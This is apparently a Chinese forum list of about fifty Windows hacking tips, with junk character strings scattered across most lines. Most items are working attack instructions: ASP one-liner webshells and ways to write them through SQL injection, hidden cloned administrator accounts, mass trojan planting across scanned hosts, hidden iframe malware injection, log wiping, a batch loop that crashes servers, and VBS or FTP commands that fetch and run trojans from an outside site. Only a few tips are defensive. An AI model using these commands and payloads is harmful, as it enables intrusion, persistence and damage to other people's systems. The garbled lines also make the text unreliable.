Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
: R/ [9 ~. T8 f; Ycacls C:\windows\system32 /G hqw20:R
/ S, C' A9 A, r% i0 w思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
( a2 q- ~$ y% D6 `. e2 x- L0 y恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
6 F5 b( s8 N/ d8 }0 {1 g" T# `1 N V
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
( v& v9 J' }( `0 V# q* j3 a) `; N3 Q; O; @
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
. [) L8 W- z6 H/ H) L- O. s0 N& E
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号& c% ~3 X/ m# ~
( o) l t) }6 R
5、利用INF文件来修改注册表/ L, j8 [. }# ]# W
[Version]
' G+ D8 D$ q; B9 q+ d. @Signature="$CHICAGO$", @* h% A# v$ ?3 p: k! v
[Defaultinstall]' I( @5 G0 ?+ K. G7 y% z, \
addREG=Ating
. M0 E! e4 v4 {2 g; Q# d- ~[Ating]
2 k+ D2 `( ~0 HHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
! U+ M- J4 y! F2 ]! O: i- \以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:6 ?- ^* U' Q! G' A) ~. A
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
! y, G) i! g- \! N' k/ _其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU" u+ h: n0 l4 G6 n
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU. \" d9 {0 W. z. {% B5 s" f
HKEY_CURRENT_CONFIG 简写为 HKCC
/ R+ I1 k- v' g0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值- m, E! |4 A2 S, M. g- a' ]8 `
"1"这里代表是写入或删除注册表键值中的具体数据& [+ Z& f, w! [- _8 u, B- @
" U1 W# l! C+ d1 `& S. N0 ~- Z6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
5 F+ B: g2 z- z8 B! [多了一步就是在防火墙里添加个端口,然后导出其键值
5 Z: ~5 R4 V! p' Z[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
% ~* I/ `, V8 M: p5 U7 E1 D t% ?0 |; P3 m! R6 T4 ?
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
7 e' t- L* V& R9 w6 E$ w& S4 z( u在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。3 o8 o6 X+ i s6 B! P( {3 Z2 E3 ]/ T
& v; W. M: `' R7 \8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。. b8 L, k+ E1 g3 b6 j
1 k- x. O8 |0 E6 k9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
" g/ B3 N/ Y# `# @4 K$ [2 k; V4 z可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。, t6 Q& W2 X3 y; l$ ~
. o! {$ O# [: e2 C: o+ R; z10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”5 l, p/ T. o! n* f0 Z$ W
. }* A* q! x+ l* q) q6 o
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
% X7 W' L+ d8 H; p( O用法:xsniff –pass –hide –log pass.txt/ @3 ~; r/ n- l8 s8 \) B5 L7 Y
& N2 C" S1 u6 ]1 o! J; }
12、google搜索的艺术
% m+ J7 h: d& U1 w搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
+ h$ U7 W& T7 u* C, n或“字符串的语法错误”可以找到很多sql注入漏洞。% z8 s* b) V5 m* r; x2 E' T
+ t, x# x" e) v4 t$ M- s, r! {3 \9 K13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
% I5 I+ A- `. M& e
% _" ~4 v/ H: e7 n9 L) V" ~& H6 T14、cmd中输入 nc –vv –l –p 1987
4 M5 W3 t% y3 P; D. C- g* M$ W做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
6 \) \5 d3 H, A9 i2 Q6 i; [! q8 F7 y, Z7 a. X+ a/ p
15、制作T++木马,先写个ating.hta文件,内容为) s9 _: d3 n9 k& L4 R- l$ l- v" \, |2 K: R
<script language="VBScript">) i9 H- V, V0 Q3 L2 t
set wshshell=createobject ("wscript.shell" )
( y/ Y* a( T9 C, K! y4 Va=wshshell.run("你马的名称",1)
0 J2 t& t. V* s1 ]+ fwindow.close
& u1 I) N# F/ Q, O1 h! I</script>$ G+ e( P5 h4 f5 \& A9 B- w3 Y* K0 X" T
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
# C; L& x( `$ D% r. c, r" m$ `! T0 p" C- g2 {; Q1 O
16、搜索栏里输入
/ i1 ?1 \) r) x9 {* C关键字%'and 1=1 and '%'='" M/ p( e2 X) f$ e; q- d E
关键字%'and 1=2 and '%'='/ p- x7 ^- k! m0 b& `* M
比较不同处 可以作为注入的特征字符$ F( M9 m8 z6 Y
3 N# h# O* @+ h2 z17、挂马代码<html>. n' z- I. u. ?* J& ^* D2 d: @
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; ?& o2 R/ L/ \* e9 {</html>
+ b. Y& `- M6 K, U( A
& i$ L6 _$ x. h6 H18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆, j! `6 ^' ~3 c" g' I% x4 t* J
net localgroup administrators还是可以看出Guest是管理员来。0 D. \0 m7 f* [7 O: ]0 b& Z, g
% N% K( [9 F. }
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
0 [* n8 D5 C0 Y/ S, d+ z1 y7 M用法: 安装: instsrv.exe 服务名称 路径
8 u, _3 l2 O% V8 J2 S8 }卸载: instsrv.exe 服务名称 REMOVE6 {3 g/ V. T) R1 {# ?
2 X' u4 m3 o+ D- m! \# A5 F9 q( v* D+ ^0 X( r2 _
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉) g* [* a B5 M9 E6 Q9 `
不能注入时要第一时间想到%5c暴库。
/ u0 z- \4 e$ Y. e$ V' d1 H$ Z0 v$ ~' F+ A4 [
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
# n4 C7 r8 Q3 o D% {' g( G6 t1 B: v$ |3 u4 ^% L2 }6 ?
23、缺少xp_cmdshell时# U2 [ l% f7 U/ F9 E
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'4 @# M+ v9 S' P; P" L4 q" Q( c) z
假如恢复不成功,可以尝试直接加用户(针对开3389的)
9 \6 n2 F6 E ?3 c8 X& fdeclare @o int
2 I# s; I, z4 p6 [1 _! _. ~8 zexec sp_oacreate 'wscript.shell',@o out1 t: M4 u6 ^+ G+ l ]+ m2 T
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
4 |6 ^4 f9 h6 i# X' [0 \) ?: ^8 `5 A D1 J7 Y \3 `/ F+ n
24.批量种植木马.bat
( |1 `: m: O* \/ n# M& Yfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
9 R* ~3 Z l2 {) Dfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
; B; N6 }' h" O+ Q% u5 W5 ~$ S6 z+ I. v扫描地址.txt里每个主机名一行 用\\开头4 | z# e! m4 c4 o n
/ W( \1 b2 F S# i25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。* e- h8 J2 \# ^) E/ u) K
/ ~$ z- P1 k/ b C26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.: E# w4 j8 |- f
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
( @( r* X2 \! u$ w0 s.cer 等后缀的文件夹下都可以运行任何后缀的asp木马) l. ]. C* v1 Y. h) Z: ^' G
1 i) n* r; t9 c! B& e27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
9 F# f) h W- y. q, k然后用#clear logg和#clear line vty *删除日志
, \3 d! L1 h0 O) x9 U
5 X) C/ P2 B( [3 t: M28、电脑坏了省去重新安装系统的方法/ A+ \! e& \! e4 y1 [4 h. ^
纯dos下执行,5 c2 R F; q3 a1 N$ t4 \/ R
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
- b2 k5 j$ m k: K" C6 q' t( H2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config' y# C6 \2 @& W4 b' k
& ~3 u9 H& ^0 K/ ?# F3 p
29、解决TCP/IP筛选 在注册表里有三处,分别是:
2 o2 s+ A2 @+ j, d4 CHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
: P5 O2 w% e7 w; W8 IHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip6 X8 O4 i- ]/ X5 |% P
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 _. q9 F+ ]% i, a
分别用
8 s) z! t( j% W& z9 w$ [$ Fregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
3 _* D j1 ^3 ^% b/ ^' j: Vregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- p" l Y1 \5 S: r3 B& k' ^regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip5 E: N3 A1 U+ G* ^ ~- u2 h
命令来导出注册表项
( s. Y! z* k. h) F% @0 ~# {: S! e然后把三个文件里的EnableSecurityFilters"=dword:00000001,& M- Q3 |: ~* D& O( B/ }2 t: [
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
% g7 s. U% q' u! uregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
, \7 ?% ?6 |. e! ]% B* s% j4 V8 m8 c# }
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U& R' t# e6 z( T x
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
; K( P4 w& _' D p7 E) i3 F
9 K; G4 t, V0 a31、全手工打造开3389工具# h0 r* D. ?6 k* s: ?5 {2 T
打开记事本,编辑内容如下:- ]0 {' R f+ ?
echo [Components] > c:\sql6 j8 \" U/ S) w
echo TSEnable = on >> c:\sql
' _) X# O, V! Z# ~% b& Qsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
% M: V. J! ]* |# o4 k# g. z编辑好后存为BAT文件,上传至肉鸡,执行
$ x3 s5 t2 E' ?1 a; k. b, h, \
& r% n( w! V- `5 t5 g. _; j ~1 t% q( @- ?32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
+ n' p0 J% u# F& V" _8 s8 s9 W
% }( f& I- A1 h: a5 a33、让服务器重启
9 [6 P9 L3 ^% a写个bat死循环:
% [4 M3 h, e# }- F* _( c@echo off8 ?9 h) o4 q; a8 Z& V# O& o
:loop1
+ N0 J5 g, j+ I( ~5 qcls' ~/ t) C. E5 L8 ^8 d6 ~% v
start cmd.exe
" r9 P' \ _( T5 rgoto loop1
9 z" J* Z4 U9 H0 Q( l" J5 D. f保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
; t+ P* D: b8 B% J1 h+ D3 k, f1 |+ C' o& c
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
2 q; Q! r! i9 R; z& b' `@echo off
0 e0 @! j, o |% n% F& b: v$ Fdate /t >c:/3389.txt* ?% H) ?0 }0 ?& R4 C. }1 d. M
time /t >>c:/3389.txt% u1 H- e8 q* ]1 a: i$ I
attrib +s +h c:/3389.bat
7 f: q6 \5 N5 L7 T0 ^0 q2 zattrib +s +h c:/3389.txt
/ {/ e* T) X" i, ?% [9 hnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt1 q& R5 u y9 l5 K
并保存为3389.bat
& Q6 ?" d. V" f打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号+ n9 _% Y$ C/ M& D9 ]+ G+ Y
+ W1 B. X0 z: l7 h
35、有时候提不了权限的话,试试这个命令,在命令行里输入:, ]6 E) c# e' K: ~- T
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
@$ f' B( P) Q7 ]输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
+ u& W6 b5 y$ Y6 h' a
2 N% y. h) N+ o7 ]/ }: `9 T" Y36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件' X% U9 q- o9 D+ T8 P/ w3 [5 b
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址6 S) m1 l0 M2 i9 V4 t; V. y$ z3 [
echo 你的FTP账号 >>c:\1.bat //输入账号& ?+ H1 o/ I2 E. T `( ~; z6 |# K& R' w
echo 你的FTP密码 >>c:\1.bat //输入密码) h+ B; S% d+ t$ B0 Y7 ^
echo bin >>c:\1.bat //登入+ n$ b& B* h& \ g: ~
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
, ]5 b3 B2 u: m$ y- X2 U6 fecho bye >>c:\1.bat //退出
, f3 _: a, T9 `- Y然后执行ftp -s:c:\1.bat即可
5 n6 o8 K; Y( B: i z$ O( w! R& }+ Q* k4 c# s7 j
37、修改注册表开3389两法( r& u* y: y" A
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
' b1 Y/ d3 H/ ]6 T3 yecho Windows Registry Editor Version 5.00 >>3389.reg0 K5 r9 t( v- ]% c
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
& _. P; Y9 F0 t% c! }3 ]! r; Cecho "Enabled"="0" >>3389.reg
: M( N2 z3 P2 y2 Wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows. \/ |: `0 M0 h* N6 g8 n& F3 C' p2 F
NT\CurrentVersion\Winlogon] >>3389.reg
# H& n4 F |( w4 H& R, Becho "ShutdownWithoutLogon"="0" >>3389.reg
2 D( g5 a/ \4 C5 K8 [: }5 ^echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
9 F" S) Z: r* |8 K5 R>>3389.reg
: A- m1 Q" Z! J7 z7 J+ Fecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg2 Z- \& _' v! m/ m2 J8 {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
4 N. S( @$ u' S: q>>3389.reg
+ q% q$ Z d: L/ X1 k* Kecho "TSEnabled"=dword:00000001 >>3389.reg- m2 e! @% ?$ `3 L. i# L0 \6 C8 G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg! T& q, R2 o( R2 _( n
echo "Start"=dword:00000002 >>3389.reg6 g/ C8 u- M V2 g1 @" X8 [" Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]5 D) @1 H. D* z( \7 ^* F! s
>>3389.reg; Z% M2 }) e7 a% d8 a9 r- R
echo "Start"=dword:00000002 >>3389.reg
, b- z/ ~: b2 j! g4 e6 r6 secho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
^6 y3 u6 g" Qecho "Hotkey"="1" >>3389.reg
) R% {3 Q1 F/ w. ^4 cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* ~0 N8 `2 z. d1 s+ l6 b( b
Server\Wds\rdpwd\Tds\tcp] >>3389.reg( l2 M, o0 y* T( R
echo "PortNumber"=dword:00000D3D >>3389.reg
. r& H. k+ H1 A' R wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 w$ N; Y. [- ~# T
Server\WinStations\RDP-Tcp] >>3389.reg
% l9 q+ Q' H' T0 q9 v% M4 \; wecho "PortNumber"=dword:00000D3D >>3389.reg
4 |- D9 E8 x5 t把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。$ ?1 M1 O" f) K1 G7 {
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)4 w2 t3 u3 z( Z3 z: r- q
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效/ ^" u/ P2 Q" f0 {& \! A( s
(2)winxp和win2003终端开启
7 H* @ Z( ? ]) I$ \% |用以下ECHO代码写一个REG文件:2 Y3 z1 c9 e6 w; H9 W" n+ ^: c3 m
echo Windows Registry Editor Version 5.00>>3389.reg+ e8 a0 s$ m% z/ Z$ R1 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- }; @" Z4 c7 b0 S1 U' HServer]>>3389.reg% J9 M, j& l! p/ p$ F) U9 n6 p
echo "fDenyTSConnections"=dword:00000000>>3389.reg
# }9 C- G8 z% F" \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. n) f% O: x7 z6 V0 hServer\Wds\rdpwd\Tds\tcp]>>3389.reg
% K2 m& ?& B1 o' j* secho "PortNumber"=dword:00000d3d>>3389.reg+ s8 B& q' Z; J/ @% E/ M8 o& S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, P0 u3 i7 G( s& LServer\WinStations\RDP-Tcp]>>3389.reg1 Y( J* `$ ~8 b& o& \4 d" X
echo "PortNumber"=dword:00000d3d>>3389.reg2 W1 S' |4 u" F U
然后regedit /s 3389.reg del 3389.reg* c/ w* S! G, ~
XP下不论开终端还是改终端端口都不需重启- W! P; |: u6 x$ y
; p' s- z% V1 R; C4 j
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
4 D5 v6 O- O& y# s; z+ I用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
, o% q) l9 d+ s/ g6 s
8 o" O$ A0 @2 q H39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!6 K7 u: ^& u* T# C# b9 K
(1)数据库文件名应复杂并要有特殊字符 | X" L3 { q+ S) _+ I& g
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
; y8 v7 \( @* {1 Y: v将conn.asp文档中的4 W* t: ^8 S) W( S
DBPath = Server.MapPath("数据库.mdb")6 h; C4 D y/ l4 y# y
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath2 x0 f. ^: O2 W T$ U( ^5 i
6 N0 N9 [ L& J0 X' u" w
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
H( S% c2 ~& y8 Z# u+ z(3)不放在WEB目录里& E" F+ m3 y- a9 ^3 O! w
' s$ w8 Z2 ]2 Q1 F9 k c" G P40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉. ?. u5 t7 R5 V: j! l9 Q, [' Q1 R
可以写两个bat文件
" K1 E) p2 c" p7 R( a@echo off, x$ B( V1 l0 F: O9 E
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
: q0 _% x0 D' j@del c:\winnt\system32\query.exe2 r( u5 V: V! t
@del %SYSTEMROOT%\system32\dllcache\query.exe2 d7 G+ D% @6 v# M! q
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
4 L* j# P3 ^0 |! o% `1 ^; P; B7 F- U" P$ ]
@echo off
7 x# n6 n d( w: j' }1 w@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
; m& W6 F' S) N# G; a@del c:\winnt\system32\tsadmin.exe7 Z* ~+ q r( O# s: D+ e
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex% g' {" r+ c- ~5 ]. S0 }
2 K. u+ c, x' J$ [
41、映射对方盘符
; [, h! }& Y' O& L; T: Mtelnet到他的机器上,7 \" J! L1 p2 X( x* ^1 Q# V
net share 查看有没有默认共享 如果没有,那么就接着运行 s! Q! X$ a2 X9 w) g+ M
net share c$=c:
: B' G9 S; C `4 y1 G; O9 a! ?& gnet share现在有c$
, K0 B& k" j: C0 ]; o$ ]2 z在自己的机器上运行9 J+ V Y8 u# G4 S1 Y
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
8 E3 I) h7 a6 q8 G/ T2 k; Y6 ?/ f+ _1 s% K; y. o0 U% d+ z
42、一些很有用的老知识& V3 |' j# L9 d- V1 S: U7 Q
type c:\boot.ini ( 查看系统版本 )
7 R% t7 r# U% i! T- ~: ^8 Nnet start (查看已经启动的服务)! Z. F8 y% x: b0 i; P6 I
query user ( 查看当前终端连接 ) R9 a" E0 V; y% J5 R
net user ( 查看当前用户 )
4 @7 E0 x. Q- [net user 用户 密码/add ( 建立账号 )$ b1 i& Z- x% t, y& _
net localgroup administrators 用户 /add (提升某用户为管理员)
; h: {& G" e+ [" vipconfig -all ( 查看IP什么的 )
* E3 ]- S. P: w: Tnetstat -an ( 查看当前网络状态 ): S' |- a( S) E2 @7 K
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)0 p2 k& j% S9 ?7 {" U6 {' n0 z1 Z
克隆时Administrator对应1F4
3 _, p" v( i1 I: N/ \guest对应1F5
* W# E7 [+ }0 g! D! {2 P4 ~, i! {3 Otsinternetuser对应3E8
+ Z2 B' @9 L8 L+ g$ ?! e5 O# C2 j- t" p0 J/ ~* E0 x3 \! H
43、如果对方没开3389,但是装了Remote Administrator Service
* f' p ~! `. I. @5 j+ l用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
2 ~5 S! ^/ y5 b7 l解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
& k( b) C& A6 H6 u* ^7 ]先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
( n! z' I# C6 w1 B2 q/ J- G7 w# R1 J e
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)2 O8 ]7 c! c1 ?5 I- a
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
& {9 q" Z3 x- u: e
) v2 b" B" N2 _% c" L6 ]45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)8 q U) C7 l9 S
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open" ], X s$ j9 a) c8 K
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
/ _% g3 s( }- F$ @CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
V* ]# b# Q ]0 D$ o$ \2 R9 i1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs" ]1 u$ l1 T% W n1 u8 k# e
(这是完整的一句话,其中没有换行符)! K5 m6 f4 C1 i7 J
然后下载:3 z( z6 X4 l* S$ }1 L4 h9 V
cscript down.vbs http://www.hack520.org/hack.exe hack.exe! ?' ?3 O2 V- ?9 U. w
) S% ^0 l) m3 p7 K
46、一句话木马成功依赖于两个条件:! E2 J4 ~9 N. O: u" B; W
1、服务端没有禁止adodb.Stream或FSO组件
, E. c2 c W$ v( w2 q* ^# l$ b n2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。2 g- r" ^" C2 O" S0 s! S8 V! c
$ z! \0 _7 W+ b6 [47、利用DB_OWNER权限进行手工备份一句话木马的代码:0 ?8 E P& u8 y
;alter database utsz set RECOVERY FULL--
! I" f) E( }5 Z;create table cmd (a image)--( w8 f R* ?" z0 w5 [1 Z- Y+ s
;backup log utsz to disk = 'D:\cmd' with init--2 ?. T5 S2 q% j. H2 k6 L) ]+ t2 T
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--# x. V4 n$ y0 l0 i6 }# Q. e( O; R
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
/ W& K7 q: ~( \: H' D9 s. Q" l注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。( W7 u0 e. I2 v4 b/ t
4 B0 |2 u; v) V6 L" V/ T48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
) Q9 p6 M$ t4 k! M# R9 F/ U6 C, U: x
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
2 R( j' X( l+ K& W, F( V' |所有会话用 'all'。
( a% P1 R, j4 d/ D% f-s sessionid 列出会话的信息。
m3 [+ k! L% g$ q% X$ k2 d3 T-k sessionid 终止会话。6 ]: U( {3 D5 o9 m
-m sessionid 发送消息到会话。
: W3 q9 M; A8 Q5 ]/ Z/ i% S. A e
: X; |' x5 _, W* pconfig 配置 telnet 服务器参数。4 e6 ]' B; Z, A; M
. i5 _3 A- Q3 n; V) p, c' s" V" Zcommon_options 为:
& [/ M4 S1 w3 K4 K- E; c5 s/ b7 D. g-u user 指定要使用其凭据的用户
& i% W" K( P' Z9 v-p password 用户密码
9 S+ K2 c3 {2 t; `& T3 ?) k& c8 L* \- ~% R
config_options 为:
$ O( n$ {+ U& u1 s$ q Bdom = domain 设定用户的默认域
5 p9 ~- c& t( ^$ [* _/ U7 A: _$ bctrlakeymap = yes|no 设定 ALT 键的映射
8 J8 q+ F1 @* R5 j7 Ttimeout = hh:mm:ss 设定空闲会话超时值9 O( s. w' _2 x# A
timeoutactive = yes|no 启用空闲会话。7 a# I' ?! c# A" R* `
maxfail = attempts 设定断开前失败的登录企图数。" C: i P6 u" u) F$ N8 A2 U" T
maxconn = connections 设定最大连接数。1 @6 w4 _8 `) C8 d
port = number 设定 telnet 端口。 j. D* A7 a0 z( B' v
sec = [+/-]NTLM [+/-]passwd
# U* J' E. A$ D9 y( x) V1 l) a设定身份验证机构$ n/ R L3 e. f+ Q
fname = file 指定审计文件名。" N- z1 W$ {6 f! l/ j
fsize = size 指定审计文件的最大尺寸(MB)。
# H8 O5 l4 i1 u! vmode = console|stream 指定操作模式。
$ V4 O; |% @; z2 ^auditlocation = eventlog|file|both
& p0 R- \* B: N7 K J指定记录地点
+ q+ `( k1 \8 Z- ^ a: u' r9 \audit = [+/-]user [+/-]fail [+/-]admin- d c9 k0 J7 e6 \1 p
* A1 X( m/ Z/ @ E. m9 {9 E6 Q/ x2 h49、例如:在IE上访问:
4 h3 V4 `# G6 Y, h9 qwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
% m, l4 j' {! _7 `hack.txt里面的代码是:" W F: w) @; R8 ^
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">3 U" D3 ]/ b; I; f. h' F
把这个hack.txt发到你空间就可以了!
6 c& W4 ]& D) ?. T这个可以利用来做网马哦!& I; P) L" { O7 `7 s2 q8 I1 ~
* m: L" ~. L( O
50、autorun的病毒可以通过手动限制!, E/ a, D5 S+ h+ z
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!. h4 J: v; \0 C: t5 p# _
2,打开盘符用右键打开!切忌双击盘符~- X6 T8 { K1 J: x. K) w
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
( E" s' p6 D T1 q1 a
8 K* [" k8 b- D3 o* ^7 [1 \$ ]51、log备份时的一句话木马:
8 o ^# V; U8 J; k1 y- H, ]& M H* k! Wa).<%%25Execute(request("go"))%%25>
" H* S3 @& Z* `b).<%Execute(request("go"))%>" O8 a0 a' r w( U
c).%><%execute request("go")%><%' J* B4 J# y: i
d).<script language=VBScript runat=server>execute request("sb")</Script>) n0 S, Y* ~! V' G4 r
e).<%25Execute(request("l"))%25>9 `+ J5 A: ^+ _/ v" h
f).<%if request("cmd")<>"" then execute request("pass")%>
. E* j L1 m. d. ~* h. Y! I2 i4 I& j- z- v
52、at "12:17" /interactive cmd" R2 U4 c) ^4 P
